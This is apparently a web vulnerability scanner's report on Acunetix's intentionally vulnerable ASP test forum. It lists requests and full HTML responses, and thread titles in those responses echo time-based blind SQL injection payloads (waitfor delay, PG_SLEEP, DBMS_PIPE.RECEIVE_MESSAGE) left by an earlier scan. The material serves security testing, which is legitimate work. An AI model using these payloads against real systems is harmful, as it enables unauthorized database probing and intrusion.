style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=49 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4231 |
Response Body - size: 4,231 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum KHr20UMM'); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/KHr20UMM'); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>KHr20UMM'); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4137 |
Response Body - size: 4,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>showforum.asp/.</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=50 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4234 |
Response Body - size: 4,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum NebDWBkM')); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/NebDWBkM')); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>NebDWBkM')); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=51 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4264 |
Response Body - size: 4,264 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=52 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4267 |
Response Body - size: 4,267 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=53 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4270 |
Response Body - size: 4,270 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=54 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4309 |
Response Body - size: 4,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:58 AM</td><td valign='top' bgcolor='#FFFFFF'><div 